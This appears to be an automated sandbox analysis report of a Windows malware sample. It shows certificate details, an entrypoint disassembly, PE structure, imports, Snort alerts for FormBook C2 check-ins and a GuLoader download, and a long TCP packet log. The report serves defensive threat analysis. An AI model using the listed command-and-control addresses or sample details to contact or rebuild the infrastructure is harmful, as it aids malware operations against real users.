                                                                                      Signature Issuer:E=Afruse@Paaberaabtes.Unp, OU="Perfay puces ", O=Absorberer, L=Hermerode, S=Sachsen-Anhalt, C=DE
                                                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                      Error Number:-2146762487
                                                                                      Not Before, Not After
                                                                                      • 15/03/2023 09:03:08 14/03/2026 09:03:08
                                                                                      Subject Chain
                                                                                      • E=Afruse@Paaberaabtes.Unp, OU="Perfay puces ", O=Absorberer, L=Hermerode, S=Sachsen-Anhalt, C=DE
                                                                                      Version:3
                                                                                      Thumbprint MD5:D200528519AD6686EEFFD2596A2A2F55
                                                                                      Thumbprint SHA-1:597512FD1BFD1E677353ED0A5021A23E7F5CC129
                                                                                      Thumbprint SHA-256:874162BB890EF7A67C60203F2DD0E4EE2F4015C6F2C437BC175010C6AE2FB567
                                                                                      Serial:57F1B2B5B2C4B7C9C1DEF821A4632D692E16B719

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      sub esp, 00000184h
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      xor ebx, ebx
                                                                                      push 00008001h
                                                                                      mov dword ptr [esp+18h], ebx
                                                                                      mov dword ptr [esp+10h], 00409198h
                                                                                      mov dword ptr [esp+20h], ebx
                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                      call dword ptr [004070A0h]
                                                                                      call dword ptr [0040709Ch]
                                                                                      and eax, BFFFFFFFh
                                                                                      cmp ax, 00000006h
                                                                                      mov dword ptr [0042370Ch], eax
                                                                                      je 00007F3DD45EE7F3h
                                                                                      push ebx
                                                                                      call 00007F3DD45F18DBh
                                                                                      cmp eax, ebx
                                                                                      je 00007F3DD45EE7E9h
                                                                                      push 00000C00h
                                                                                      call eax
                                                                                      mov esi, 00407298h
                                                                                      push esi
                                                                                      call 00007F3DD45F1857h
                                                                                      push esi
                                                                                      call dword ptr [00407098h]
                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                      cmp byte ptr [esi], bl
                                                                                      jne 00007F3DD45EE7CDh
                                                                                      push 0000000Ah
                                                                                      call 00007F3DD45F18AFh
                                                                                      push 00000008h
                                                                                      call 00007F3DD45F18A8h
                                                                                      push 00000006h
                                                                                      mov dword ptr [00423704h], eax
                                                                                      call 00007F3DD45F189Ch
                                                                                      cmp eax, ebx
                                                                                      je 00007F3DD45EE7F1h
                                                                                      push 0000001Eh
                                                                                      call eax
                                                                                      test eax, eax
                                                                                      je 00007F3DD45EE7E9h
                                                                                      or byte ptr [0042370Fh], 00000040h
                                                                                      push ebp
                                                                                      call dword ptr [00407040h]
                                                                                      push ebx
                                                                                      call dword ptr [00407284h]
                                                                                      mov dword ptr [004237D8h], eax
                                                                                      push ebx
                                                                                      lea eax, dword ptr [esp+38h]
                                                                                      push 00000160h
                                                                                      push eax
                                                                                      push ebx
                                                                                      push 0041ECC8h
                                                                                      call dword ptr [00407178h]
                                                                                      push 00409188h

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74300xa0.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3a0000x21d08.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1354080x1818
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x294.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x5f7d0x6000False0.6680094401041666data6.466064816043304IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x70000x123e0x1400False0.4275390625data4.989734782278587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x90000x1a8180x400False0.638671875data5.130817636118804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .ndata0x240000x160000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x3a0000x21d080x21e00False0.9174858740774908data7.758972914922993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0x3a4180x11d3cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9978499041358532
                                                                                      RT_ICON0x4c1580x6782PNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9879990942712658
                                                                                      RT_ICON0x528e00x28b6PNG image data, 256 x 256, 4-bit colormap, non-interlacedEnglishUnited States0.9959700633275763
                                                                                      RT_ICON0x551980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6062240663900414
                                                                                      RT_ICON0x577400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6512664165103189
                                                                                      RT_ICON0x587e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.6993603411513859
                                                                                      RT_ICON0x596900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.7928700361010831
                                                                                      RT_ICON0x59f380x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.526219512195122
                                                                                      RT_ICON0x5a5a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.7247109826589595
                                                                                      RT_ICON0x5ab080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7287234042553191
                                                                                      RT_ICON0x5af700x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.6693548387096774
                                                                                      RT_ICON0x5b2580x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.7128378378378378
                                                                                      RT_DIALOG0x5b3800x100dataEnglishUnited States0.5234375
                                                                                      RT_DIALOG0x5b4800x11cdataEnglishUnited States0.6056338028169014
                                                                                      RT_DIALOG0x5b5a00xc4dataEnglishUnited States0.5918367346938775
                                                                                      RT_DIALOG0x5b6680x60dataEnglishUnited States0.7291666666666666
                                                                                      RT_GROUP_ICON0x5b6c80xaedataEnglishUnited States0.6264367816091954
                                                                                      RT_VERSION0x5b7780x24cdataEnglishUnited States0.4812925170068027
                                                                                      RT_MANIFEST0x5b9c80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                      Imports

                                                                                      DLLImport
                                                                                      KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                                                      USER32.dllGetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
                                                                                      GDI32.dllSelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
                                                                                      SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                                                      ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      192.168.11.3023.227.38.7450130802031412 10/16/23-11:30:34.341610TCP2031412ET TROJAN FormBook CnC Checkin (GET)5013080192.168.11.3023.227.38.74
                                                                                      192.168.11.303.33.130.19050138802031412 10/16/23-11:32:59.120800TCP2031412ET TROJAN FormBook CnC Checkin (GET)5013880192.168.11.303.33.130.190
                                                                                      192.168.11.3023.227.38.7450133802031412 10/16/23-11:31:15.754112TCP2031412ET TROJAN FormBook CnC Checkin (GET)5013380192.168.11.3023.227.38.74
                                                                                      192.168.11.30104.21.19.22750127802031412 10/16/23-11:29:13.108417TCP2031412ET TROJAN FormBook CnC Checkin (GET)5012780192.168.11.30104.21.19.227
                                                                                      192.168.11.301.1.1.158176532023883 10/16/23-11:29:33.045985UDP2023883ET DNS Query to a *.top domain - Likely Hostile5817653192.168.11.301.1.1.1
                                                                                      192.168.11.30104.247.82.5150142802031412 10/16/23-11:34:01.586007TCP2031412ET TROJAN FormBook CnC Checkin (GET)5014280192.168.11.30104.247.82.51
                                                                                      192.168.11.3066.96.162.13350134802031412 10/16/23-11:31:36.580336TCP2031412ET TROJAN FormBook CnC Checkin (GET)5013480192.168.11.3066.96.162.133
                                                                                      192.168.11.30208.91.197.2750146802031412 10/16/23-11:34:22.055359TCP2031412ET TROJAN FormBook CnC Checkin (GET)5014680192.168.11.30208.91.197.27
                                                                                      192.168.11.30172.67.210.17650147802031412 10/16/23-11:34:44.313076TCP2031412ET TROJAN FormBook CnC Checkin (GET)5014780192.168.11.30172.67.210.176
                                                                                      192.168.11.30104.247.82.9050135802031412 10/16/23-11:31:57.444382TCP2031412ET TROJAN FormBook CnC Checkin (GET)5013580192.168.11.30104.247.82.90
                                                                                      192.168.11.30103.224.212.21050129802031412 10/16/23-11:29:52.922186TCP2031412ET TROJAN FormBook CnC Checkin (GET)5012980192.168.11.30103.224.212.210
                                                                                      192.168.11.30172.67.193.17750141802031412 10/16/23-11:33:40.532597TCP2031412ET TROJAN FormBook CnC Checkin (GET)5014180192.168.11.30172.67.193.177
                                                                                      192.168.11.30172.67.148.6850128802031412 10/16/23-11:29:33.638445TCP2031412ET TROJAN FormBook CnC Checkin (GET)5012880192.168.11.30172.67.148.68
                                                                                      192.168.11.30103.72.68.12850125802855192 10/16/23-11:27:46.501036TCP2855192ETPRO TROJAN GuLoader Encoded Binary Request M25012580192.168.11.30103.72.68.128

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 16, 2023 11:27:46.139684916 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:46.500607014 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:46.500850916 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:46.501035929 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:46.862828970 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:46.862927914 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:46.862996101 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:46.863059998 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:46.863223076 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:46.863223076 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:46.863306999 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.224251986 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.224355936 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.224430084 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.224461079 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.224530935 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.224586964 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.224595070 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.224680901 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.224752903 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.224823952 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.224855900 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.224925995 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.224946976 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.224997997 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.225089073 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.585705996 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.585787058 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.585844040 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.585900068 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.585916042 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.585977077 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.586015940 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.586051941 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.586095095 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.586153030 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.586169004 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.586227894 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.586246014 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.586302996 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.586357117 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.586410999 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.586427927 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.586487055 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.586533070 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.586561918 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.586584091 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.586638927 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.586664915 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.586716890 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.586740971 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.586793900 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.586846113 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.587013960 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.947824955 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.947921991 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.947988987 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.948122978 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.948136091 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.948227882 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.948251963 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.948318005 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.948355913 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.948402882 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.948431969 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.948487043 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.948523045 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.948590994 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.948616028 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.948678970 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.948741913 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.948802948 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.948813915 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.948892117 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.948899031 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.948971987 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.948983908 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.949062109 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.949069023 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.949142933 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.949161053 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.949228048 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.949290991 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.949352026 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.949417114 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.949424982 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.949475050 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.949527979 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.949537039 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.949614048 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.949621916 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.949680090 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.949716091 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.949779987 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.949811935 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.949868917 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.949903011 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.949961901 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.949969053 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.950046062 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.950052977 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.950129986 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.950138092 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.950211048 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.950273037 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.950284004 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.950357914 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.950397015 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.950448990 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:47.950462103 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.950551987 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:47.950644016 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.311212063 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.311248064 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.311278105 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.311304092 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.311465025 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.311505079 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.311516047 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.311548948 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.311577082 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.311672926 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.311701059 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.311738968 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.311738968 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.311799049 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.311891079 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.311932087 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.311944008 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.312041044 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312045097 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312073946 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.312129021 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312232018 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.312280893 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.312299967 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312361002 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312413931 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312467098 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312491894 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.312496901 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312525034 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.312592983 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312596083 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312721968 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.312724113 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312726021 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312727928 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312730074 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312753916 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.312889099 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312891960 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.312903881 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.313112020 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313133001 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.313155890 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313163996 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.313244104 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313364029 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313424110 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313462973 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313489914 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313517094 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313532114 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.313543081 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313623905 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313644886 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.313662052 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313740969 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313796043 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313805103 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.313834906 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313863039 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.313898087 CEST8050125103.72.68.128192.168.11.30
